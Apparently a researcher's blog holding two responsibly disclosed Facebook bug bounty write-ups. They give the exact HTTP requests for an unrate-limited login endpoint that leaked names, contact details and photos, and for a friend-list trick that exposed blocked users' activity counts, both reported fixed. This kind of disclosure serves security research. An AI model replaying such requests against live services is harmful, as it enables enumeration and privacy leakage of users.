Monday, 1 February 2016

Information Disclosure in Facebook - PoC by Shailesh Suthar



Hello!

I found a vulnerability in which i was able to disclose following information of Facebook users.

> Full name of User
> Mobile number or Email Address
> Profile Pic

Endpoint :

POST /login/async/known_user_block/?login_id=[MOBILE_NUMBER or EMAIL_ADDRESS] HTTP/1.1
Host: www.facebook.com
Content-Length: 44

__user=0&__a=1&__dyn=x&__req=1&lsd=x&__rev=x

This endpoint was not rate limited!

It was not a normal user enumeration because full name and profile pic were disclosed and also, mobile numbers/email addresses with "only me" privacy were disclosed via this endpoint!

That's all ;)

Actually, Mentioned endpoint was available to just a very small subset of users (only a very small subset of users could use the endpoint) so impact was very low otherwise this might be called a perfect privacy leakage issue!

Because of very limited impact, i got a minimum reward from Facebook.
Thanks to Facebook security team for fixing this one!

Due to this one and one more, I am listed in Facebook Hall of Fame - 2016!

Update : On 10th Feb'16, I got an email from Facebook security team on this ticket that "After further review of this issue, we have decided to increase the reward to $1500 USD total."

I am very thankful to The Facebook Security Team for taking another look of this issue without my request! :-) It's impressive!

Thanks for reading!
  
Twitter : https://twitter.com/shailesh4594

Report Timeline:
============
5 December 2015    - Report Sent
8 December 2015    - Asked for more information by Facebook (Due to abnormal endpoint)
8 December 2015    - More information sent
18 December 2015  - Escalation by Facebook
29 December 2015  - Bounty Awarded of $500 USD by Facebook :) (First Bounty)
8 January 2016       - Fix Deployed by Facebook
10 February 2016    - Bounty Awarded of $1000 USD by Facebook :) (Second Bounty)
 

Wednesday, 29 April 2015

Privacy leakage vulnerability in facebook - PoC by Shailesh Suthar



Privacy Leakage : Counts of actions of a blocked user can be viewed.

Hello , I am Shailesh Suthar, an independent security researcher. I found a vulnerability using that i was able to view counts of recent updates of a blocked user. Also It was possible to view counts of updates regarding status, photos, games, comments-likes , music-videos and other activities separately!

PoC: 
When we create a new friend list , following POST request is generated :

POST /friends/edit/ajax/save_list/ HTTP/1.1
Host: www.facebook.com
...
 
fb_dtsg=AQHtqbvxxxxx&listname=NAME_OF_LIST&members[0]=PROFILE_ID_OF_USER&text_members[0]=NAME_OF_USER&__user=100002309650515&__a=1&__dyn=xxxxxEyl2lm9o-t2u5bHaEWCueyrhEK4xxxxxxxxxxxCqrZo8popyui9DBwIhEyfyUnwPUS2O4K5e8xxxxxxxxxxxx&__req=d3&ttstamp=2658172116113981185356757249&__rev=1711798


Then I modified two parameters as below :

            listname=Dummy
            members[0]=PROFILE_ID_OF_BLOCKED_USER

Received below response:


for (;;);{"__ar":1,"payload":null,"onload":["goURI(\"\\\/lists\\\/ID_OF__FRIEND_LIST\");"],"bootloadable":{},"ixData":{},"lid":"0"}

Blocked person was added into new friend list name “Dummy”.
And just blocked user was existed in this List.

Even adding a blocked person in a friend list is not a security vulnerability (Still allowed). So I checked page of Friend lists (https://www.facebook.com/bookmarks/lists)
  

A counting number was shown for friend list as pointed in below image!





I reported this to Facebook security team. And it got fixed!
Thanks to Facebook security team for fixing this one.


Report Timeline:
============
Dec 28, 2014 8:38pm   - Report Sent
Jan 3, 2015 3:01am      - Escalation by Facebook
Jan 15, 2015 2:08am    - Fix Deployed by Facebook

Mar 6, 2015 11:11pm   - Bounty Awarded of  $1000 USD by Facebook :)